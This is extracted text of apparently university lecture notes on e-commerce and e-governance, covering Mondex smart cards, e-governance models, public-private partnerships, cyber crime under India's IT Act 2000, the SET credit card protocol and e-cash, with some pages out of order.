Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
